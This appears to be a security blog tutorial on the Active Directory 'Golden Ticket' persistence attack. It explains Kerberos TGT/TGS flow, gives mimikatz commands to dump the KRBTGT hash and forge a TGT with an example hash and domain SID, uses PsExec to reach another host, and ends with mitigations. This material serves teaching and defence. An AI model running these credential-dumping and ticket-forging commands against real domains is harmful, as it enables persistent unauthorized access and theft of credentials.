Home Domain Persistence-Golden Ticket

Domain Persistence-Golden Ticket

Its not much as privilege escalation attack . There’s more of persistence attak . its like when you have already got access to some pretty high level stuff like domain controller in the domain and in this attack we are using administrator account for demo . It will help if you have already compromised the domain its a way to keep persistence to the domain easily

How KDC works

In the Active Directory domain, every domain controller runs a KDC (Kerberos Distribution Center) service that processes all the user that requests for TGT or TGS tickets to Kerberos. AD uses the KRBTGT account in the AD domain to generate the server ticket

Image title

  • Step 1- /Legitimate User: Request TGT (Ticket Granting Ticket,provide user ntlm hash) to authenticate with kdc

  • Step 2- /Domain Controller (KDC): Gives back TGT encrypted with krbtgt hash

  • Step 3 - /Legititmate User: Request for TGS (Ticket Granting Server) along with TGT to request for particular server ,in this case application server

  • Step 4 - /Domain Controller: Gives back TGS of Application Server

Now User can Authenticate to Application server with TGS

TGT contains = Domain Name ,SID of the Domain , Domain KRBTGT Account NTLM password hash, Impersonate user

What is Domain Persistence-Golden Ticket

Golden Tickets are forged Ticket-Granting Tickets (TGTs), also called authentication tickets,attacker escape the 1st & 2nd Step and initialise Since a Domain Persistence-Golden Ticket is a forged TGT, it is sent to the Domain Controller as part of the TGS-REQ to get a service ticket.communication with KCD from 3rd step.

The TGT is used mainly to inform KDC’s domain controller that another domain controller has authenticated the users. The reality is that the TGT has the hash KRBTGT password encrypted and any KDC service inside the domain may decrypt to proves it is valid.

  • Inshort if we have TGT we can request for any TGS server ticket , as you can see for tgt we need krbtgt account hash . What if we have the hash of the krbtgt account it means that we can create TGT by ourself with various tools and request for TGS for any server to access any resources , any machines in the domain

Attack Demonstration

The Receipe for forging TGT:

also you can see above

  • Domain Name

  • SID of the Domain

  • Domain KRBTGT Account NTLM password hash

  • Impersonate user

In this attack we have already assumed that attacker has already compromised DC Domain Controller

Image title

  • Now we need the SID of the domain and KRBTGT ntlm hash, for that we will dump the hashes using mimikatz for the particular user i.e krbtgt
mimikatz#: lsadump::lsa /inject /user:krbtgt

Image title

  • KRBTGT NTLM HASH: 61bd28fa97db7369c913bee99d2aae89

  • SID OF THE DOMAIN: crt\administrator S-1-5-21-1011749309-1128044670-722997229-500

  • you can also find SID of the domain using whoami /user

Image title

Forging TGT

  • Now we have all the creds needed for this attack, Now lets create TGT using mimikatz

  • privilege::debug

Image title

mimikatz#: kerberos::golden /domain:crt.local /sid:S-1-5-21-1011749309-1128044670-722997229 /user:fake01 /krbtgt:61bd28fa97db7369c913bee99d2aae89 /id:500 /ptt

Image title

  • /user: we can use any non existing user also or Administrator account

  • /id: 500, its for impersonating user with RID 500 i.e belongs to Administrator Account

  • misc::cmd

Image title

  • Now you will have one cmd poped up in which we have the ticket session created , to check type klist as you can see we have TGT created

Image title

  • Now you can use psexec tool to connect to any machine in the domain , will try connecting to client01
.\PsExec.exe \\client01.crt.local cmd.exe 

Image title

Image title

its an awesome attack but not everyone will pick this up quite yet for example if they owned the DC you can create your own new account and make him the domain admin but if you want to be stealthier have a look on the Silver Ticket Attack


Mitigate Domain Persistence-Golden Ticket Attack

  • APPROACH 1: Reduce Domain Administrative Rights, Review membership of privileged domain groups (e.g. Domain Admins, Enterprise Admins, Server Operators) and remove unnecessary members

  • APPROACH 2: Enforce User Least Privilege, Rely on a least-privilege model to restrict user and domain administrator access; limit the number of administrator accounts

  • APPROACH 3: Routinely update the KRBTGT password twice. Changing the password twice ensures that any ticket signed with a stolen KDC key will be invalidated. The DC stores two versions of the KRBTGT password (a current and previous version), which enables the KDC to check whether an invalid TGT has a KDC key that matches a previous KRBTGT password. (The Windows Event ID 4769 will notify you if a Domain Persistence-golden ticket is submitted to a DC after the KRBTGT password was reset twice.)

This post is licensed under CC BY 4.0 by the author.